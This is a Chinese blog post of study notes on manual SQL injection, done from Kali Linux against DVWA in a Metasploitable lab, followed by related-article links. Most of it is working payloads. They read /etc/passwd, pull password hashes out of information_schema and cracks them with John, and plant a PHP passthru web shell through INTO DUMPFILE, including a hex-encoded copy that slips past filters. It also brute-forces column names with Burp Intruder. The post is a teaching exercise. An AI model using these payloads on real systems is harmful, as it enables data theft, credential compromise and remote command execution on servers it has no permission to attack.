Kali Linux学习笔记—Web渗透(5)手动漏洞挖掘 SQL注入

最新推荐文章于 2024-04-27 10:21:02 发布
最新推荐文章于 2024-04-27 10:21:02 发布
阅读量750 收藏 7
点赞数
分类专栏: 渗透测试 文章标签: kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43653897/article/details/111309240
版权

SQL注入

实验环境:

metasploitable:172.16.2.63
Security Level:low

kali linux:172.16.2.65

SQL注入漏洞原理

  • 服务器端程序将用户输入参数作为查询条件,直接拼接SQL语句,并将查询结果返回给客户端浏览器。
  • 用户登录判断
    • SELECT * FROM users WHERE user=‘uname’ AND password=‘pass’
    • SELECT * FROM users WHERE user=‘name’ AND password=" OR “=”

查询方法

基于报错的检测方法(low)

' " % ()

输入'
在这里插入图片描述
报错
在这里插入图片描述
输入'' 没结果没报错
在这里插入图片描述
输入'a"b' 报错
在这里插入图片描述

基于布尔的检测

1' and '1'='1'	/  	1' and '1
1' and '1'='2	/  	1' and '0

在这里插入图片描述

猜测这里可能的sql查询语句为
select first_name,surname from users where id=''

输入:
1' and '1'='1'

在这里插入图片描述

order by排序

  • 判断SQL语句查询了哪些个字段。
  • 表列数/显示信息位于哪一列
    • 'order by 数字 -- #按查询列号排序(注释符:-- )“-- ” 后面有个空格。
    • select * 时表字段数=查询字段数

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

联合查询

  • ' union select 1,2-- 闭合掉服务器端的',确定第1,2字段的查询结果会出现在页面的哪个位置。
    此时的select查询语句为:

    select first_name,surname from users where id ='' union select 1,2-- '

    查询结果:根据结果可以定位First name和Surname位于第几字段。
    在这里插入图片描述

  • 1' union select user(),2-- 将1字段替换为函数user() 查询当前数据库的用户

    此时的select查询语句为:

    select first_name,surname from users where id ='1' union select user(),2-- '

    在这里插入图片描述

  • ' union select user(),version()-- 查询当前用户和数据库版本
    在这里插入图片描述

  • ' union select user(),database()-- 数据库名

DB用户:user()
DB版本:version()
全局函数:@@datadir、@@hostname、@@VERSION、@@version_compile_os
当前库:database()
ASCII转字符:char()
连接字符串:CONCAT_WS(CHAR(32,58,32),user(),database(),version())
计算哈希:md5()
Mysql数据结构
 information_schema

空格被自动替换为+

使用hackbar插件非常方便修改url
在这里插入图片描述

查看当前所有库所有表
' union select table_name,table_schema from information_schema.tables--+

统计每库中表的数量
' union select table_schema,count(*) from information_schema.tables group by table_schema--+ 

Dvwa库中的表名
' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--+

User表中的所有列(user_id,first_name,last_name,user\password\avatar)
' union select table_name,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'--+

查询user、password列的内容
' union select user,password from dvwa.users--+
' union select user,password from users--+  在当前数据库查询时可以不写数据库的名称,直接写表名
' union select null,concat(user,0x3a,password) from users--+  显示格式上发生变化,内容是一样的

在这里插入图片描述
在这里插入图片描述

查到user name和password
在这里插入图片描述
根据哈希破解密码

john --format=raw-MD5 /root/Desktop/12/dw1.txt --show

在这里插入图片描述

实践

简单利用

hackbar是个很好的工具,但是拥有截断代理功能的BurpSuite更方便,接下来都在BurpSuite中完成。

利用数据库管理中的load_file()函数

1. 读取文件
# 注意 --后面还有一个空格
' union select null, load_file('/etc/passwd')-- 

2. 写入文件
# 在第二字段放置字段php一句话木马,INTO DUMPFILE是mysql数据库管理系统默认集成的函数,将输入的东西以文件形式DUMP到那台服务器系统中,后面为指定放置路径。
' union select null,"<?php passthru($_GET['cmd']);?>" INTO DUMPFILE "/var/www/a.php"-- 

3. 保存下载数据库
' union select null, concat(user,0x3a,password) from users INTO OUTFILE '/tmp/a.db'--

开启BurpSuite截断代理功能,在网页中随便提交数字,proxy->send to repeater
在这里插入图片描述
注入php一句话木马报错,修改为' union select null,"<?php passthru($_GET['cmd']);?>" INTO DUMPFILE 'a.php'--
在这里插入图片描述
在这里插入图片描述
在kali机上使用ssh msfadmin@172.16.2.65查看该文件被默认放置的路径。发现文件被默认放置在root权限下的/var/lib/mysql下,通过SQL注入可以将文件写入目标服务器,但通过浏览器没有访问权限去访问文件。
另想办法,mysql不能写入/www目录,试探是否可以写入其他目录,比如说通用目录/tmp所有用户都可进行增删改查操作。
可以将文件写入中间路径,然后利用目标服务器的其他漏洞例如通过文件包含漏洞可以调用/tmp/a.php木马文件。
在这里插入图片描述

将文件写入/tmp目录
' union select null,"<?php passthru($_GET['cmd']);?>" INTO DUMPFILE '/tmp/a.php'--

在这里插入图片描述
在这里插入图片描述

  1. 保存下载数据库
    在这里插入图片描述
    在这里插入图片描述

权限分离

进行SQL注入往目标服务器写入文件时写入的文件是以运行mysql进程的账号权限来进行的。
以mysql账号执行数据库进程,在利用mysql注入时获取的权限也是mysql的权限。
所以在设计时应该采用权限最小化原则和权限分离。

可以看到用户对a.php文件只有读写权限,没有执行权限。
在这里插入图片描述
但文件包含漏洞本身是有执行权限的,把a.php文件load进来成为页面的一部分,然后在服务器端来执行。所以a.php文件在/tmp目录下没有执行权限也没关系,通过文件包含漏洞调用可以执行。
在这里插入图片描述

绕过服务器过滤

目标服务器使用过滤机制,过滤特殊符号等典型代码。
将要上传的内容进行十六进制编码。
mysql数据库会在服务器端用INTO DUMPFILE函数将十六进制内容还原成php代码。

# 将木马文件 <?php passthru($_GET['cmd']);?> 转换为十六进制
# xxd命令主要用来查看文件对应的十六进制形式,也可以讲文件对应的十六进制形式输出到一个指定的文件。
# tr -d '\n' 正常的输出每行长度相等并在结尾处有换行符,url无法理解,所以使用该命令删除掉换行符
cat c.php | xxd -ps | tr -d '\n'
# 复制输出 3c3f70687020706173737468727528245f4745545b27636d64275d293b3f3e0a
在BurpSuite->repeater中执行
# 注意 十六进制前有个空格,且需要加上“0x” , --后面还有一个空格
' union select null, (0x3c3f70687020706173737468727528245f4745545b27636d64275d293b3f3e0a) INTO DUMPFILE "/tmp/c.php"--

在这里插入图片描述
将木马以十六进制上传,在服务器端查看,数据库INTO DUMPFILE函数会将十六进制转换为php代码。
在这里插入图片描述

在这里插入图片描述

无权读取information_schema库

前面的实验是建立在能够读取information_schema库获得数据基础上,但是当无权读取information_schema库/拒绝union、order by 语句时该怎么进行?

1.猜列名 BurpSuite自动猜列名
' and column is null--+
猜测: select * from table_name where uid=' ' and asd is null--+ ';
如果列asd存在并且有一个字段为空服务器则正常执行该语句;
如果列asd存在但为空服务器不会报错返回空白,据此可以判断	列asd在目标服务器中存在;如果不存在则会报错。

2. 猜当前表表名
' and table.user is null--+
3. 猜库里其他表:
' and (select dvwa count(*) from  table)>0--+
4. 猜字段内容:
' or user='admin
' or user like ' %a%
5. 猜账号对应密码:
' or user='admin' and password='5f4dcc3b5aa765d61d8327deb882cf99
  1. 猜列名 BurpSuite自动猜列名
    目标服务器不存在列asd,基于此提示可以提前定制好字典文件,利用字典文件尝试各种各样的组合。
    在这里插入图片描述
    查找kali中自带的字典文件:find / -name *column*.txt
    在这里插入图片描述
    字典中有#出现,建议是先将#去除掉,因为#在数据库中有特殊含义,通常情况#后面会跟上临时表或者存储过程的名称,有可能会影响查询过程的结果。
    cat /usr/share/sqlmap/data/txt/common-columns.txt | grep -v ^# > column.txt
    利用BurpSuite开启截断监听->Proxy->Intercept is on
    网页中输入刚才那一串代码。
    在这里插入图片描述
    BurpSuite中可以先Forward然后在HTTP history中找到刚才的请求,右键send to repeater。
    在这里插入图片描述
    重放请求。观察服务器返回结果,发现服务器返回结果确实根据变量的改变而改变。
    在这里插入图片描述
    右键 send to Intruder。
    在这里插入图片描述
    在Intruder中添加变量
    在这里插入图片描述
    在这里插入图片描述
    最后 start attack。
    在这里插入图片描述
    根据判断服务器返回结果的长度得到由该字典文件破解出的列名。
    在这里插入图片描述
江河湖海:D
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali linux 学习笔记(四十九)Web渗透——sql注入 2020.3.26
闵行小鱼塘
03-26 827
学习sql注入
kali使用mysql注入攻击_kalisql注入
weixin_30588381的博客
01-18 1677
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的的操作系统...
web渗透测试----26、SQL注入漏洞--(2)SQL注入漏洞的挖掘(白盒)
七天
09-06 1469
SQL注入漏洞白盒挖掘方法
kali sql注入
最新发布
zengliguang的专栏
04-27 645
这是Kali Linux中最常用的自动化SQL注入工具之一,支持多种数据库类型,能进行深度扫描、数据提取、数据库管理操作、甚至获取系统权限。: 描述发现的SQL注入漏洞、影响范围、利用方法、获取的数据样本,以及修复建议(如使用参数化查询、输入验证、权限控制等)。: 确定要测试的Web应用或API的URL、请求方法(GET、POST等)、可能的输入参数等信息。: 记录测试过程中发现的注入点、使用的payload、获取的数据等详细信息,为编写报告做准备。等技巧,提取敏感数据如用户信息、密码哈希、系统配置等。
Kali Linux SQL注入攻击教程
热门推荐
AsNeverBefore的博客
07-16 3万+
SQL注入是影响企业运营最具破坏力的漏洞之一,他会泄露保存在应用程序数据库中的敏感信息。本文利用虚拟机搭建测试环境,使用kali linux进行SQL注入实验
关于sql注入漏洞的挖掘及渗透工具简介
weixin_30372371的博客
11-19 104
大量的现代企业采用Web应用程序与其客户无缝地连接到一起,但由于不正确的编码,造成了许多安全问题。Web应用程序中的漏洞可使黑客获取对敏感信息(如个人数据、登录信息等)的直接访问。 Web应用程序准许访问者提交数据,并可通过互联网从数据库中检索数据。而数据库是多数Web应用程序的心脏。数据库维持着Web应用程序将特定内容交给访问者的数据,Web应用程序在将信息交给客户、供应商时,也从数据库取得数...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
Kali Linux Web 渗透测试秘籍
09-26
Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍Kali Linux Web 渗透测试秘籍 Kali Linux Web 渗透测试秘籍
Kali Linux Web 渗透测试秘籍 中文版.zip
05-12
Kali Linux Web 渗透测试秘籍 中文版 Kali Linux Web 渗透测试秘籍 中文版 Kali Linux Web 渗透测试秘籍 中文版 Kali Linux Web 渗透测试秘籍 中文版 Kali Linux Web 渗透...
Web渗透测试 使用Kali Linux
06-15
使用kali linuxweb渗透的经典书籍,外文书籍中文翻译。
Kali Linux Web 无线渗透测试入门指南 中文版.rar
07-12
介绍:本教程全面讲解如何基于Kali Linux对WiFi无线网络进行渗透测试。教程包括无线网络监听、信息收集、路由器渗透测试、客户端渗透测试四大部分。内容涉及网络扫描、Wireshark抓包分析、WPS/WEP/WPA/WAP+Radius...
国外经典的SQL注入攻防教程中文版
11-13
最近看了不少老外写的东西,看时间相同的技术当铺比我们早了好长一段时间,比如ASP的SQL注射国外02年就出现了,PHP的也在04年出现,而我们一直到05年才接触到,看看比人家晚了多少时间呀! 为了尽快了解最新的技术动态,我坚持看E文资料,有的很长,有的很短,本人时间有限,不可能一一翻译过来,只能挑选自己认为比较适合大家看的东西翻译过来,希望你能从中学到东西。
信息泄露漏洞挖掘技巧20200429.docx
04-29
总计信息泄露漏洞的挖掘、利用、修补方式,主要包括.svn源代码泄露.git源代码泄露、httpsys漏洞检测以及利用方式,常见中间件的后台登录页面以及默认用户名密码。用于挖掘常见信息泄露漏洞,仅供学习使用
Kali Linux中的SQL注入攻击如何进行
沐尘而生的博客
08-24 559
SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过恶意构造的SQL查询字符串,绕过应用程序的验证和过滤,进而访问或操纵数据库中的数据。这可能导致泄露敏感信息、破坏数据完整性等问题。通过本文的解释、案例分析以及可能的代码演示,相信您已经对Kali Linux中的SQL注入攻击有了更深入的理解。SQL注入是一种严重的安全漏洞,可导致严重后果。作为安全从业者,我们需要充分了解这种攻击,并采取适当的安全措施来防范。
Kali linux SQLmap注入攻击实验简略操作
Dream_chang的博客
05-18 5445
1.环境需求 kali linux虚拟机(本人2021.2版本) Windows2008R2 已经部署的dvwa服务器 2.实验部分 先启动两台虚拟机,并且启动Windows2008R2上部署的phpstudy服务,作为kalisql注入攻击的服务器预备。 (1)打开kali上的Burp suite和在火狐浏览器上输入之前部署的DVWA,然后登陆进去,选择dvwa security ...
手动漏洞挖掘——SQL注入
m0_60637088的博客
02-16 2188
SQL注入
WEB安全系列之如何挖掘SQL注入漏洞(时间盲注+cookie注入)
weixin_34310785的博客
08-04 441
http://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=9216&extra=page%3D1%26filter%3Dtypeid%26typeid%3D70?from=51ctobaibaiWEB安全系列之如何挖掘SQL注入漏洞(时间盲注+cookie注入)0x01前言 这是第四篇了~0x0...
渗透攻防Web篇-SQL注入攻击初级 1
煮酒闲谈
08-03 1665
Preface不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一,这里我想问,我们真的了解SQL注入吗?看完本篇文章希望能让你更加深刻的认识SQL注入。目录第一节 注入攻击原理及自己编写注入点 1.1、什么是SQL? 1.2、什么是SQL注入? 1.3、SQL注
kali Liunx 利用漏洞注入——SQL注入
Sword_of_despair的博客
11-19 454
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符,在结果中,你可能会发现%的结果总为 trme,这是因为%是通配符,它可以和任意一个字符匹配到。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。我们的载荷列表是a-&,1-9,和所有特殊符号的集合。应用程序会对上传的文件进行安全检查,当然,安全检查的手段是多种多样的,常见的是对后缀名的检查和。
E008-渗透测试常用工具-使用Vega对Web进行漏洞扫描.pdf
12-02
Vega是一个易于使用的平台,它可以帮助安全专业人员和开发者识别Web应用中的SQL注入、跨站脚本(XSS)等常见漏洞。 课程首先介绍了实验环境,包括两台服务器:一台渗透测试机(Kali Linux,IP地址172.16.1.12)和一台...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值